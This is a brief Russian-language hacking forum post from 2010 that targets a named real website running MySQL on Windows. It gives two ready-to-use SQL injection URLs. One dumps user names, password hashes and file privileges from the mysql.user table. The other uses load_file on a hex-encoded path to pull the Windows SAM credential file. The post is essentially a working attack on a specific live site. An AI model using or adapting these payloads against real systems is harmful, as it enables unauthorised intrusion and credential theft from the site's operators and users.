05.05.2010, 18:55
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами:
8700497
Репутация:
388
|
|
MySQL 4.1.14-nt
серв на винде
http://www.naranjeros.com.mx/detalle-col.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(group_c oncat(0x3a,user,0x3a,password,0x3a,file_priv))),11 ,12+from+mysql.user+--
резалт
лоадим файл SAM
http://www.naranjeros.com.mx/detalle-col.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,hex(load_file(0x6 33a2f77696e646f77732f7265706169722f73616d)),11,12+ from+mysql.user+--
в hex
|
|
|